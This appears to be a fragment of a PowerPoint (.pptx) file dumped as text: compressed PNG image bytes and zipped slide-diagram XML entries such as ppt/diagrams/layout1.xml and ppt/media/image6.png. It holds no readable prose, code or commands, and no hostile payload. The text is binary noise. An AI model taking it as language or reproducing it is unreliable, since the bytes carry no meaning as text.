....F@..=...8..B@!..P.(.v..E.v.y.\..B@!..P.(..4..$.i...)...
...B@!.[.(..[...*...
...B@!...P$iO.G5N!..P.(...
..B@...B^=W!..P.(...
.=.."I{Z=.q
...B@!..P.....$.....
...B@!..P..i..I...Q.S.(...
...B`..P$i..W.U.(...
...B`O#.H..V.j.B@!..P.(......"I...z.B@!..P.(...{..E...zT...
...B@!...-..I.-..s..
...B@!.....(........P.(...
...n!.H.n!....P.(...
....F@..=..oO..<.px..q.3.f.f.9.}.;|...4oQ.}#..\W..c...%.......<.Us..............N...}....Y..V..[]..x..(........
pR.....P......O..$....\W.............|.G8..CfT`..so.....{f...$.`...8~.m>o.....G.....w...ga..b8...u.......O..^^.).V.......$?5l....}.A.}.?p..OB.....x..    ...]...?..o=..$}.U.U.{Pp.0..,@l'8.....o...>,.y..'.......f._..v..o.D.l)#.4.h.?..3..e......
....`@x.B.$I$.].....!<.7.2e........@.....$.......:..0d.........^...-.^....................k......<].....7.T.z..(...1..O..$e0a.|..!I..M{X1.....jW...?<.-e`_....L1O~sm..t.Fh..dAOjLV;p..W...a...S\....\..F.{...G.K....O!s5|...{.............p...I..1....Iz9..I/7!IK.p]>..........O/;.[.2,E.N..X........=...S.m.{..n.].iC......6?.c.......'5I[...MO..4........z:..~x..u.|..s]..oI*@..*...*\1..k..!...U\..M._...h2....1]... .;E........IZ!I~..o..9...g...w_....h.......|..X.D.p...o....kz....,N.}..g8..i..Y............L]Sk..}.....i.....?.E..?4c.e...).89u.+%n/'p...>........h7...........$.3....go...lI''.~.7...{q;}J.....1..q..?.>../2......$==..........{..'......moj.)...|G..E........l.8.F.....p...xm........;.O.#.Fj..0..iI;..RO..k.(..R.C
..:.......i.7.1<..+.w8......a~m..X.:._.m.=Q.,.#`8.......Qm...$.......w.g..G03..._..F....[.*..u.{.u.......ZDg.0.t..7../c..?..5.<oD`x.Q.-.9...._.?.$.o..8.....!.....O0..f....JD.....Q.+$+].$.s\..x......z9|......x...O.,..gx.4.1d:.W...s.N.~. J.v..Q....~....N.T.....5||..I.&E..$...hX.La._./.f..........<...a    .8.DPu.}.8.    ......>.H......:....>q{!.;.;.yc.g..S.k..#8z..p.Q.Z_...s.q"....JO)m)..-......{.....2......4.6a{...3y...>.hX...S.........E.t.}.....G.......r.L...}...o.=F....L.....).6#..<.#.n".fW:.;--x....yA@......&I+]...$r..Gj+......1N.........L...$.W}.......H..s..m..g..d....~.J..thm.....9...z.Y......M..+m....H`............R...d...Br}.
.....}. '@.....7^...7..Zg.`.=    .;..^.....Ck.%Q..5IZ_/.Z..E.@."....Y;~..+x.z.V.d.....:...8Iz...t.X@...$o..rP.....'.7r..Y..v...V$i....#^..n7\
..V..    .N"I..mB........    .>.7....K...H....u[.....Cq[.(#.f..o.lU,i........n!.K=7..'.P$.....$i..._2.s.y=\..}V..:.C..BJ.$[{....S.~".&. }..y$i.gn$.[.OM...g...A.@.=s.'.".w.,...!=..........?._..N~.......O..M.)&.u8o..Q"t....2...A^....-M.z....4H..m..~|
.g...zJ..?....%q..H..t.,$)..M..6......Z$I.%J*.^..R:.NI..uN...i...i.aj..sD.....#E^../..+..    j..{6...D..Iz....)#I..6|v.0.'..IRn..eo>.....&...OE...gM...[.@s.....x.....N..S.W\..'.G..:>1...?'...$...&.V.$I.. ..h'..B.2.].y...#I/.$.c........&;.4...$....(..)|'....jK....'..T27F....j.T$.[3{...(.......y:....?...7[O.....S).ja..S.(.Im.IbVH{frjE.rr.m{.O..4.I.I.~..hi.'5.._..6.84]..x....o......YQ..y....j.....P....l.HR"....g._.RHR..m..:.v`]...n.c...6...&I    ;...J...IJQ...F....D....tIRJ.]..........]O..x....(...l.1....D.6>..G!.>..$......T..."j.ns..VD..n...y!hI..6.w.....LL.`..'|....nz......m.m.......hE...n>3.{..pd.p..d....i.B..2...-G......h.......<.'..'.[..
..p.....CW..k4...]......p.8....8A..E.........]........a.g,.."..xzfXD..oU9..)u.C...8 ....x..=......p{..}5..oYT.....b.....U%ND6.j...y.M.2.M..>e...J..u].lw.......t.6....np.....I.k.D..r....3.....N./\.w....m..{gB.q...e.E.g..m..I..wI.....^~@.#.Vg:`:.....?v
_...N...k?.....D1n.....'6.=......^ .m....$...v...w.[...o.t.........N...i.f....t..1...?^..tC...>......._."..~..$...=9k[..}...~n.._...e.'..8..K....YH.4\.....v......w.~".v..........C.."~.Iz..?.B...}Gp....\.2.....<.!9.....xR...b.dD.DM....z.....T.%......I...>...4.v[..xk......K..*.>...<.".`....N.z.s0...g.S........s...|.7..H....j.B`o".F=..l.n...8q{7..m{.:q.......E.^$..Y
.lG@...iP{w..?x.......gG.Q.h>N.r....i.....'A...O...
...P$)s...
..@.!.HR..L5X!..P.(...
...."I/.e....B@!..P.(....E..Ne..
...B@!..P.....Iz.(.g(...
...B@!.u.(..u*SV.(...
...B.E .H..@Y=C!..P.(...
..C@...S.j.B@!..P.(.../..E.^....
...B@!..P.d....{.u....P....IEND.B`.PK..........!...cqt..........ppt/diagrams/layout1.xml.YQo.6.~... .=..$n..)...
...d{.%..@Q*I'v}.<R."....-.=Y.x.....;...o*.<0..Z..d4&    .Y..b9'._...Di*r.k..d..y../..eu...^.KV$.".9...J..<MU.b.U..a.......[.LsI.....t<..yI..V.... *Z
..E.e.>.s....*3Y........(....*.Y.4=K..i..8...{,]j.......8.3.uG2.....p..m...8$id9'......U.tE...j....s.3..M.mtR...D..\!.3.....{#..N...%..].q;.M...{...or.....&..............Wf...Em.'v.V._...v.....f.a.......B.=....{.....I@....&@..&N...u!..._.K...U..'v..k-..Vz...s.m......(.b~..!...........2..]\94L..d\..(....y2.r.C....<..{    .`:....t..d[AbQ.N.............<.....UT@{.Q...K.T.D..-.X>..l.;/....T....m.g
.8..L.....U]+.}.+.]=*.......k..    ...Jh.`=...../k...h{.5..N...=....+.A,....lN...*...Yh/..5.e...w.......hx.fy..X....6.5z....+b.vYg..    ...R.8....U.(..../.....?.._.........1..d..t..    ._.3.....[......m.m.l:..n.#.V.W...0,...<.3...6..^.;..e.q.*...
..`l....x./S@N@.9ju..
n..._...;8>...p..p}.v.8s.....9.P..S.....;.uUm.E......l0
..WW..w_.....H2...n    Kx`..&.}o.?..Cp(.....pb.G(..f.5gmM57}=.ts....qCoHR....+/...H..4[.bj.B]....M..
c....'.......4T&FK....s.Y...    ..z    .N.q.^..z..C    U.'..S.........Y[G.
..p......._XED.....(...i^>...}E.....b..-..3.Q..g....S<1.C{..{.R......3....(We...6N...A.."...?.Kqy..q..tx.Hl    ...mn>-..`...?C..Q.S.\#0...`K}...{-w...7.........]2f.    .~F.....yuC.;\..
j_G.}.Q......\..@.r.....5U..... ....3..,C...z..~@>.P..4..Gb.z.Z>0/....[...W.Q...8...D>4..c0...~.TV&...[....;.^...Q.f.G.U.hGFxI..l.;.......Q,.nz.........7.......PK..........!.Y.......Q......ppt/diagrams/quickStyle1.xml...N.0...'.."....M."E|...B...p.'.p.`.P.~...Lb...9...i...........xU...*..H.xo."*.L.....v...E.`.b..M....x...Q...m.8=.Yd..zbO%haL9.cM...zO.T.o3.
l.G.............8e8W.@u!.E..    .-.._..4AK%&.#Jj..=".Xf.#.~...[.....%#w...fE...M}..3.F..'.....j......6...82O.m.. .......G#WB.....&T..tz....*l.I.Tf!m...FfJ
.....|anX.)f.......(e.~jn.......H...$dJGu.....yy..gV..>.M..#nl.a.*A..7..&*..q....Nh.h_...5...3p.f.....z..6q..,..4..=^.o...-...`B.........4.....U..=.n......Su......W...;........
..#..v.a..T@...vv....K.K.s.\p..H...$.U......:.Z=I....@.'......9&.....{&...53.....].....S.0..a.8a..... .l~.....!...I..M6.._@..a...W..Q....J....uAm...A........v..kY.u.".s.40-.`Z......~...f.h.q....i.jN5[.n...
1.....J.f)...e./:....j.h....Z%Vg..U
._/.... ..q.A<.#5.k......K\.n.....    Z...... .ZD......."...B@.."..V...3......q.}@0::z..5..N...@......mp9..|U0.JK.R...m.i..<........:,....V0^.O>f.n.y....BI..y/......S|..T.....S`3.{ofk.uy.C..{.my.C....bh.{OY..9.e..b.....    .)....`.2.0
`.43..I}B.J.......v....xl.4.............PK..........!....<.....A......ppt/diagrams/colors1.xml..]O.0...'.?D..i. V...........M.4.q2....g;......4...&........I...    v..eqJ<0<....?b.y.....)p..$.8%../........(..)N).A.#..6..<0.<.....(.. ...g..&...4r.
...........0.0.....D.c.......m...%.$.i.....i..a..........S7....>"|.....;.1..y..........G|..........    B.).d4.D..!i.U..W0.....;.&.2..hP...._c*.;    .S.P.!..Y8R\.8...l.l..4....;-a>..Y]..Aa.|..)h..]i.:2..]...x..P.xn..V`.8...`1...2..xH....n....'v...".(..@.Ma. ....F~C\
......SJz}/.NT%..]..n.....b...$....3.H..1.}...c...|^.2y....".K....8..u.WV..1.x.@!a.7....n.l%.(.....]|.F?-V.......V.6....Z..+.&...0....#.....MS.../-..........#...1Ng2.#.B5..=Y.......Ur.j..!c.&....1g.....5c.]/..m.IAb....6..0.l.. ....^..T.2..1.N.Ma3..4.G.Z..h..v.(;...B..f....YD......v.....5..:.....N........D.tE..............[,.e.(.4v...p..k..>5....b).[.K.^.).
+...<...3N..KY.f.....<..T/8...m.`)...a....nS.5%.r...x.1.-D..Xv..-..{....".fq.v....l}.g<.(.8..U.A....Y.....S.....&...M..[.....
q.t.E....9Z.x3.-.......2.i...N...K...SK.._..<^.cf....].....0-.....Np.....\.{..'7._...S.U{..=.y..S......K.+....U..})..V#[..W...T.o...e8........PK..........!.DsNz....E7......ppt/diagrams/drawing1.xml.[.n.6.}/....,..hd...J..I.M..A.hI.V..../IQ......tHio........`.2C...3.#......Ns..M=...d[y.6YQ/...w...V..:.eS.S.s......i...2%.@..6.. [VS...V..I....l.4.....FU..[...JU9!.....K%+{hD...J..Z......HU.6..I.T.f.(.|m.6...qh.....<.....j5_.Q.m......lj..jY.G....
.&.=.t.}C.x...&........y.b.....Fh..@..e.Eq0.q........-..e...............u>...>C0..S.R!...<..;+...%....Rx.1..S-1.6.Rm.<o*K_Lm....-......E.".q.$EY.N.z....?...hd..>.m7W...&IK...0'`#2...Z.E....&X.0.#....(h..tK.AEk...R.d.o.n._.u...;....y.d...............m.F*.....0...Q_l.LI......r.*_...&....vo.....M}REM    ....J.K....S.cj..Z.D...6.n...Y..d....e...|..^.'.........K...d./.......a..i&....T+.-o..:..'..lft+.....k1P....E9..M.....8....J.-58...~...S....V...S.4.j...P...\.U....7..y...j.|)s.>`....u_...A.)...y].......F..=WA...^.o.4!..@...>.>..,.6f.A..jB{..C..<A.        .....    .0v.a..r......    .... ?...Q..~........M..u.Y....i...R.@...D.....e6.M......J./.g.c1..+BvE(..v{.v.....D0.Lj.....Ao.....!.m.r.......ctHsz<mS..Nc.F..\g..P2M......'.kH........>*O...d.:.......tO.4..(k.....T..D.(e..W..j..r.o.5..........w........d..x.n....o.>4#.da.Y..p.3......].6.(.M(v./b.%.;~...R.Q,..G....    ...".R#......k.I0.....i.\fC.o.r7Jz.......&...i.
.....0N....4
.J..............Ff.K.?...`...^;y=._.+..1.;...8n.q...q.,..Cy.......Y..0......8.C.s".f.{...N\...2...G..C.G......e.'.;KP.{.;....D..    .l..(B,."..........v...
.Q.........#....vW......;2..T..Ow.a>...:..5.y..%.3........_5...x3...0.y.......#.?..C..Bjp........k..D.M...r........k..b7e...9r.G.5....."...`..}.v.'.p].0.<.....c&|...+....d...j..5.....nM5u....s8b.].R.]K....../.\]6.....b.z,......8......=....s..Xx..A..a.D...;.\.{(N.....c.7:..    .#..s......0F....+.....Y..b.3(....PQ?....:....;....F...h..1..^u..1..p.p..#'.9..8.%'......X..k.......:..GQM8.z'\...L.$..D....e.0.....I..p..T.G.y...R.j.o.4...H@.i,.^{.x$..g.9....5.....v./.......PK..
.......!...d$............ppt/media/image6.png.PNG
.
...IHDR.............G.V    ....sRGB.........IDATx^.].XTM.....l..Q@.D.%.....V..n.;.......R......>....,......[....w......+....2t.5..~...u..u..../.......&..RRR.].;e.R...3g..1.v.....m."@...P.(.....E."@....?.2...v....N.81q.D.....O...#.e.:&&........tT.#B[..P.(.....E."@...P.$.JDE6"....._.......Q...u3.QU.c....8|z...L.m...8PWWW.FhI..E."@...P.(.....E." ..P"*...p....._.zE..l.n.(....
......./.........WQQ..AZ."@...P.(.....E."@...H.....v,.<y.X.../......3}l...
.n.2..x.4z..}.T......ckkK.h...-P.(.....E."@...P.(....%......WP....3.t..!...TVV..Q...^{.............)..E."@...P.(...@.""".J.*t..^...!...t...G.....9....;88..;.&%.B\Te.EqW.........0..W.....<....[/oR.[.n..[.l._U.;E."@...P.(....#.V..O..M..... .
........s...?.g....%...~Q..c.L.7..((....w.?.6z...tt...4.K......P.(.....E W.x./."8.V(..E`....$.....9...T.fKYyj..t@.Eq...:h@O#.j.6!.r.1../..]..i.&.......E."@...P...*_40...j..=.4.s...]...
E ..p..j..].....zzz.w~..E.o%JD...x..m;..!....@...........>...b..1c.P.."..6I...P.(......./f...._4.?...ms(_ ........T...2.g(...w...Jzzz[.l......y......q...`.>o.<....6B.h>...4hnf:i.p{...0.>...O.... ...tT....."@...P.(.%..L.....E...........&.,H..]4.y    .Z..bB@FFF.##.......,.e(..udyDqQ...-...VVV.......e...7..^.,/.5:.3....E."@..X.../..v.?.9...?....Ep..V..bG.MD..y....Z...Z.V-SSS.0zyy.N.....{[...D4...EqW.X.....N....d._........;..=v.......X..E."@...P.J..P.8{.,[.s.h.A.{...*..z..a.>..\..h.)D.MD}||..l........).%W.%.....K....9..@.b........}..[.*.....[".M;I...P.(.....x. ...W.~...9bg...SG..W...x.T.{\y.(MJQP.i....%.......J}1<..H..sgFj.q`..On-Y8....L.Y....)..<....C.!....u........ =A..E."@...P..F..........a.f._.p.....&.22...4ml.g...{6BA...M........E."@....JD9....m..y..u..~....+k....F....*h.U+#+.........3:N.S.N8..e.".........E."@...P.J%...."".....u<.w..s.A&..?..UTT.../.=....E.8
.....T.JO."@.(......#.ka.p..Q...
....*.j................=........{r..y[[[.6..Iz8..E."@...P....~Q.U.....yYD.....p.m...L.4..h......p..........1j.KD.....vZwh+i..y.........&..#SR.....o..=...&.....7jp9=...O.....IeuK.S.v."@...P.(..D._.b..).N....-..Q.t.....k6..(..(<......%....4.Q<.......v.K..]ut....xK.+(+....)$%.&.........+X(.....uw.a..=|.r..}..>....u.:e..-..D..).....E."@..9....._.<...au..+...[.....v. .>~..N9..<=J.#@...C ]D.ip...cF.10.....-)++...'....h\B.(hLL...W..Y.tl.......W,...........{.......Fzt..E."@....    ....v.;..1...q../.F1].z..Wo./."...j.........DTp.....?.....<q......xK.....+'....._.......{w...2.........w.0...g.,X...EC8.wd..).....E." ...|1u.T&/..Y....7m.H$.........rFF....M,.R"*8t.d)@..Q..Q*TsyDq..:.t..m...5........zYU..Y.......uw.... ..v.nw........V+##..GYEy.S...w./.I..x)#.z..Y.~.....%).....E."@.... QKDq    ..."./...l..R..........-+.........)!..nP.(...@).....6.0.:e|W.[    ............;+.>....z.f...7..&U..l..'.NVB......./..{...m........
...B...P.(........._\...qP_1./*.h*.h.).;!)..Ce....__..M...u...UA.W..P.....f".......`q.u..u{.ee..)....
J.......".:......3;..c:v`....Z.R..t....;..2..9r.O.>4.K.^.......E."@....(_...{...L.u.....M...
JjD...4)9.....Qz.J'..we..[~..Y.re........wi=y.s..._..o..:::%.L.....4....LOL..].wtt..m.v.....
..=.u.......0...u...fy))W..'E."@...H..P.8p..............F...B^^IQU.....1.I..S"*.Q.....x..I..&.d......z333.9......Qx.8....$...B.EVVVQUKNN.&.......1.........iy.h..C...W(..r........<...:.|.r....8.m."@...P.(...!...};.B..:/s./f

.E%UM$.KN..K.G...B......Q!..V)....Jr..+V.        .'.....?...>k)d.._.(5-........O..*+'....%J.H....Q...Dw.....bX...=.>..p.T}..E..&../.=pp..s...7.y..S'..`...? h.).....E."P:.....N.qc.;...:q.V-#.Y....#'.4reU5.2.2B#|0]!,.n..iF...l..@......9bbh....f.h....I.&....!Z..hFfjbR."...5.).W.c.oJ.:.Y...?#c~fd.?|..W....&y.}....S...\7.u12.!.5....(...Z_:sh......|.2..F....ki~..s..P.(...... ..M...m..#.....J*Z.je3..0].....A..."P\. ..f.....u......ks.
...Ga......#..M.i.*U`
...+~q.ZQ....Q ..(d...JQE....B7.....^VFN>*6(4..]}....!....I(.............y..m!...(..........#W....I..JG.....S.(.....E _..3R..S..t..E....QNVN.IY..8..|.G.P....k...Y...'k.......c.......3.A..={.../22....+V..... P..m..@
.[...
".a..L.K.C.........>.(...6.,.L.
..(._....6 ;...w..vh.......Y.Mt.Y..{......d..a.K$.hi..J..N.."@...P.J1..I...J...
*E4.QPTSR..WTe.+..Ozj..!.....VA].B...0.bO....-[v......?~<....{w..M.@H...e.y..%%%....H...l..+W.,e. i!...F..B%X.j@..2..h...'.........G|._(..\..]+..;...r..._?<u...e.....W...^.`..Gn..%....B<.h...E."@......p...hEeuEN..(.D.|...!............v.6E.(....U.9/.K..v..u......2d...../.f.:.`..Bl....."......9'J...X.........}....K
Ice.q.W..Frj...Op....:r.d......0n.......x.C.Nb>FF.......m.............J.....E."@...P.J...i    1.A2.r.d*."..rX-.LW...+.#.+YY.%.
.I...... 9...e*w...    2...Z$..#%........."..../AY!z.S.8'..X9.".d .]....\.P..3,..P..@A.Tq.......Q.....p..4h...+I........%.gV2.....(dZ...C.......Qx.......S..=="E."@...P.(.....}....&"......K....5.t.SD..JA.5F....6m..fee...'$$$&&.......+...M..H1PV....n..-7:Z.cG...b ...".............t...TAA5#3.rDx....=|.....#.zy.G@......aEM.(....6nt............@..-L...P.(.....h....K.1q....O],..".g.>...Jz&....G.gd.....5..T!.

.h.R.&$..
}....&L..n.t....Pe])%.........O...E....|Q.@.].8.k..........y.9j.T..c...0op.....w5mb)9^.y...}...4..L.......).....E."@.(<.AA...1L;i..Xj.O...."..+.....EN^.../...|KIK......@.(.......)..0]....
.    .uAG.P..Q...+.e]$z...b.%.D........b-....!'+'*k$.4.X......`oPP?...+6..1...{....w\.t..}........w.]....nbr4p.R_1^.......E."@.....4.i.....l(0.    .........WP..8\ns...t.IYP7*&.g..LW(.....p.4i.....m..........))BN.!h..Q~.(b...e....~.....RK..(@.i4!)2":...r
*.K.ZG.W    Bu.y...O.."Q<.nL,(h.6....^.X.j...7].:.z.......$.t+.j.G..(hJjB.\.......E."@......4y....}...yf.I)...FD.$....8.q&'.)2.`."+...Q....Q`).... ........{...p..u4444>>^8.).....H.....J.*..-)..RDD..............t..a..6RX2.:.}R.t..S...R......o...G.X.Z1.t..Q.........Q\Q._...@.....m........P......E."@...P....L../W.,.B..x..y.g......u...............o.Q.H....
.).......c8..q!.W..I..%Z." =......zyy5j.......k9.?333AD....'.]..@G!e...[.... #:i......"":m..9......~...fF.t.Q.......[.....axV..G9...
Xt...1*..G....!.',^....4........W..@..l...k.k.T.....Kq    a..
...U(.....E@l....k.R.!..,..#.A..M.1......U....h.u.....Q.zzz
..C#}.1.v......HEq.........[.SMM...i.a....z..........Q.....{{{...#...P....<y.......iT...YE....Y............Sy........X;.....r.(|W..+W..b.y?`..................1v.t/Oo.....M..[7..Y..DXA.I....e...    f..(.8.Kz,..E."@......hu@.....K..L...a.(....$..U....^Y.j.._?..=mX..../9..?.e..$....E W..V.J.sQBUUu..q.>}.wO.....#G.z....}7((...C.....5j....` ."|..~={.D...O]<...'..]...v..q..    e..FFF-^.b...<....KN.G<$.~..."*R.....o.....A.    ....%..EF.w..iN...
jaav....G.7k.X...$.QV....$......vA..#."@...P.(.....'O.w..)...fL6.]8v. ...:
..$O........'...FGG{....+T............K..-....
.."@..'... #......[.
..7.w...y..f...5..........;t.Pww..?~.R
...,/...y.&.4.....A.}.    .s,)".8.1c..?..r.J...n.....x.Z...k%1    "...G.......R.Q5...O.1A.......c..-.{..u.>i.......u.b_.yJE.....bA.U4..".".."Q...-@...P.(....&XX.o......IO6.[t....=.......3cG.&....    .\]].....9.}.6mZ...`....;.F.D..^A^^933u..9....<pt.&6[6.....Y...we[S..Ep...F.......^.S.\.
...{...B..7o....6|8............".Qkkk...w..!.K@@..8..%.c..ncc..;b.......
....mJ......P...]?..s..F..C..q..o.....X.!."!,<:.g.GD.GD.$*s;...j.m......k...|..`.....7.......F9eU......?.-    ..-F...P.(...bA..MPPL...O:.|....w..rPQU...>FF....t......H.8..}...J.....Z{++mm..../\..g...\.{.>\....6V...?~.Z.z....[6.....o...E." ...D.....B.G......b...7{..1l.p,..9v...x.........D.......3.u..;
...}.x...Y.D.3*.*RGD...A.c'./Y:..a.MLH.........|S...".....l'C5e.......9LWWG..l...D...TUC...a..H.......h.....E."@....PP.....P.q...<s.........&......|..YC......N...........[...Y.._..=i....K ...-..c...u......6.4KJN........yZ."@..A !!_..Om....#.>...7.....{..........@8AV....@4.CBB
..."I..m..1i.......F"J.._.....|......}.....G...n...o.(....".........T...(.....l...>Pf..T.nN....E."@..A.....-.i`..O._\8w..~..]LAG/..`.z...Q..Gd).KK4.Y...+V.6|...... ...B....=......~E...._;q........7..[8.Z....q.h.h.).E...o.f......::o...O.....}.zEp..cm....h......5..oA......]..8kQ.)]Dt..m.<.U.V36.............4x..m..O.4G..~.r.T...~..gA%.MU.r......E"*.+.;..C...P.(.E...(ng..+..m\....../T..e{.....?.g..$..p..9r...y..fZ..gT..M....4.w.zuBC.C.C........s.......o...E." ...*U...l...FM..dU..M...[...+.    .......k......q.%..........6X..E<....v.h..~.[7..p32R..SU...7==Y.L:"....4x.h..~..\...e..;.3..%&E..SV+.o.1.PTR.[F......(...D.\j.(....E."@.....Q\s3..{6....ic.!..Hu`o.....V-...`C.=...............3o.....55...HNN...Y.xu..6.].A.H8.i-..E@@.....,....    c.|j....l....&N...>[[..6.s...t.>|...
^*..P.)&.Y....b.a....6n_.l-.......
Z..TT.*)i...Z.js..    ...|.~.......s..~.v...,.9.(...%.q...R.H.".4...t..U..&(.....r..2....E."@.(...Eq...t..!.;k!((......!...<a.Prv$....+...V\.....HJZtBb..}w$..;n.mg.
....E`vr...q...n....S....5U..
6Z."./.F5k.Y.MG..<hoo.q.Fh..X1,,...#<<<.f.(.P..S&))).n...t.Q....[.......}W../.E....b..2R.*)#.......5b....Cy..;....5...w......#\433MQU.:@.:..u19y.EUM.e........F#....."@...P.(..B._.w..._..:....YH..T..].`....&.....?>d.Jh....i.I...*.&M[.a...cfN.m.......O.L.....#S.ly.|)..@CH.S....X)..h...5.[QQA.....Y.j..g/...@G..e..MP*.w.Ef./_. B5..3t#222"".OKI...#...-C..s...52.2q..    3.N.:.,,......K.5.gt....K.3.L.Z.r....B...y....P...........$E.-.E.,.s...STVWR.B.........|E..Q.(......#./.;a.p.7.......SFVV........|...m...|.. ..df.....$$=3!:...A.a..M..h..qC..B......_Z..)....L.99........g.o......d...9...O. 9.d|y....%444::.....p.DnR.;Y..I...X....#...v..%.......e.{........O.2...[..m.9{...)~].n...r.pA.hbr........y....VT.J.H.#nd./JA%...=..P.(.....(...._<..d..J..E..[....C........(@V....%t8@GS.c#.......h;~.......8........E." ...6m~.....w.;..]..C....H..pXGASa...-h.Q..J...."
.g5CK...z...=s\Bb....Z.n.w...M./]t..'H.M.2......w[.l"....&..........BQ.A...+......aQ~.dd..E....%).....E..!.#.k.....S[6..id(*G.|...Q.N.....:... ..l....1..2*W.\...pR\s9    \
j\.[... FO."P....\F5W..r$.L.&M..;t......Z[[.x...J.u.9.)CcD...HJ.&.ff.w..Y.j-S....ti....G/...T...-Y..Q.sg/.YGI(..t.......`.....L.. .C1....++(......3$.;.p...%(.....E."P|....Z.7t=.......Z.K.EX@M...^.2.r.cQS.T...`+..!.....(.......-J....9..s..]|.9.e......rlf._...S....U,.Z.e..,... ...q...: .g...................$...V.w..I.....    ..g..b....%.PDy.%..5.M..+.+...+D...
....St.m."@...P.(..G......L...IZs=........E....Yd5..W..PP..........d....-......P..E..Q..3Ik.^...b, uD.Xgd..r.T.2y..z&f.......oR..SF........#'..7.6y..uE2<HR....9.d........,...*(...'D......I.i#....E."@.("....y;...9<.!..v......VEEUl,TYU[C.."T..##..J...K....[.O.]..Y.@.E.x.2.........m.........RL..(....HL...\...#GM1.g.......q...:....j.J.......y.6.....]...E......D.d..!i[.w...".v.ZJj..`o....D..&..E."@......D..J.*..I.2y..O....1DWWGt.........c.......Q.X)..S.s.}..oe....+1...." ..@....
.....9|..I)%.dt32.c..5....=..tE.F.....:t...f..?~.~.    ..U..5|...Z....    |w.7[v..n.(......O...7.KxD.?.]..)+.(..........'....~K).....4)....@.E....p.Cr.r
...<^=\...R.J9GJ...D...j..U.*...E.%$.*7....T27n..}...}}.E{. j.....A..D{h..E@2....f:.cJO.....J..(.....L2..6jd.~...c'..S....O/.    ....;$%'..........Z....|.#.
j..gg...O]..pffzL\pX.orJ.....(\v...p....U@.h..F.....4..o.=..(.....E." ~....W.^...v.o...m...5k.-..^....'-=.....0E..."=..W..Z.5.i.0k.3O........K.'..\...q.6-l...J......K.A!.?
m."PB..[....<~....M.6.:~..c.cc.s<G....)......ND    X..)..p..gR.,....U.XIKK.a.z....;....'.Xdd......,....sy...S'...P...q.b...56!..V8:F..r.y%z...G    \........_....).....E."P\.0..gN.8u.P.fM.........j.C..bA.H.Wpq.P..e..5.T.q.\`ThTl..r.3
.......Wo......2i......}..%......    .?x*...mR.J..l.\.. dTKK...GW.\.{.R3..G......M....f..>k!"Q%.FJD...|e.R........4e..I..t.nff..}K'.^..O21.+H.-ee.c'.T.R)22....mZ.....=.P..omh....(0R....8 .R..4.....22Q.A?.(.d.O.W....E." ...Z(.h...*.h........>P.'...%....}..B./....3..A.....Y.t].....y@Z.b.....q......]..>U..TWGZ;.v..E..../\...#..i-.@)C.D4444>>...].t!t...93......Q..|.;.JDyq..)%-:4......y.....,.....r...-......^..n......?...8.....P..QR...........c.B....[....../8TBbT`....(.u...&h-..E."@....)...Q.
.P.-j.......##.........."=/Ih.    Z...tn........l.}{...#.z.Q.'n.d.oe.o..u+.4m..E[].ZN.......lh.......>... ..+...V)@.G.633366688.y.h..U...M.(%.9_.Y.3S.."c.......m...kwg..Ue..    x.....q.=q.....4.p......?~&Hu..%$EGF.....+.#.@.._.VJ........P.(...IF +3-.!..?.j...g..."...C.(!9&0.sb.@.5..Z.}..B-#...bT.FY]].V....-r6Y...W.6.z|.......:n.MK.>.W..V....9........A.......~.<.O.Z....cd.
;.~......EK..D{^.......K6...4........l:z....5*...#((,)9=.OjZ&O.x.na:\.u)..}.....3S.R....c.B.4o.SV.I...L>
...].x..#..V....4:n..=..
.b.}E......
....~...P.(.........^l|pfV...&8..M.rr.
......v    .....*.>..v@ .9.'...qV........;.Yu...-;..5c.........j.j*......i..Z...n.u$...|....r.R...$....3PDDD...n"...?~0t.9w{...i.......~..jN.R.5%....\v.:4...`W`.r...V....si................'._...Z%yb
....h9..E."@...........@uOAIMQEC..[.9fP|.....%&>...
>.. .3kI6..8.Q..>.w">..4.ii..Q.FujW.Q.B....v....6v..5-...6....>..i.....}...E..d'.....$E.$"P.zu..yg....H........A.../.:..^.#...H..D@
.gJD.......S.|.aJ#`c....:.MO.LL.JO.k.......Is
NG...-G...P.(....G.r}1.Ap.QPR/.iTAQMQQ-=#....%..H..s.I.A !.....h..-9q.......K..{.o.......5..t.JKSWSVU.SW...r.
...r2.|...Z.....&u.:gh.:U.#....j.c...p....."9A..E.. @.fn..+.u.......H~:.......X........L.A.I.E......~R"..`.ky.c...l..i.v.c..pe...eq..32R.Sc-,,.W....cW..wn....#GT..).U..E."@..........._...>......R.2...+..BiB#|...J..% _..V.....o
.9OaP.I.ga...A...=N.j`...y}.)._.!&;W.7.o....al.....a....
....w..M.W.{z..e...5..g..........K.(Y......a??....?~.....2.+..o...MG..y..A....q....?.4. .... ..]...B"....A*...]<^..0vZ.7.3\.........#.}.fe&..1=,,..k.!N...7.=s    rv......;.W....g-.I......E."@..-.AA.......'...Rb.........}.!.....Il..........)=[.N....;....ig.......q.S..m...5.iU.V9Y.yY..u...N&3#1&...K...-..enile...}+.jz!....e..d4t..4........`.O.>..:^z....t".....8..r......&L.......{.......d...}....4==.8.>{.......j.?.?&.PL.FWI..JD....{..y.W...&......T.|.QP.mh.....(......-S..G*..
...........#...=...cm.F..'.?{E...t..E
.m."@...P.D.....{.r.>l<;.$....#."|!...er
...B7._..;..twc.C.[;!I.'[....brr2$...X.r...#'{.....t.z.....VWC..|.ZU...*..._.*..W.S...gg.^.?..E..U......J.6....u..Td..k...Vym.......}..q........-O.(.....2...5.6..3g..4...|......3f..Q.....).n~...:........E........L.k.S...T...F)Q.%.eV.....a......&.\(..idabn^..9.n]m....4`..._Zz2...b~.E...}....v...=S...q...^S.s.......9....|.F...P.(........#*W.t.......?z.>5dPC.......9FNY9YyE.I9.TV....'.1.W....\}.J.\y.....&..*T(....u....e.n..'.XR...$:..9'#h....Z.f?......)..[...T.f./...y......
....[.....(R......>DF.)...u.p...g+Y=..."_(.....q.*U.f.%.....cI.E...>.@ZZ.J.:.....a.n.....\../W...U.FD[W..(.b.>zj?..A..}g..MNx..u..@..F"g.\........4c...Wn...!:.O/..k6..]M....5......[......e!o.U...?...R!......Q.(.....E.p. .....;tl..W.......e.FI.....E../..~..B.C.CG.SR..36... <.
.....:Z..kn..N.._..u-L.....S...~W~Hs...@N^Pl
e.d....3x.%.'`........d.&e.T3...~.......6-.GE].^.Se.l.(.1(.-.."..`D..\...{..e...0.].r%h...W.[....9.S.N..k..5`.TUUURR....._......;w.|...].Q......e.....>.{6..;.aq.. *.D4**.J...I1q....Yf.Z..X..Ez45.r.:..61...E[K...'.+.=z...E..'...Q$.m..|..y?..O...c.z.....    m."@...P.(........=s.M...;v....k_.x.c...'
......w....w.0..5g
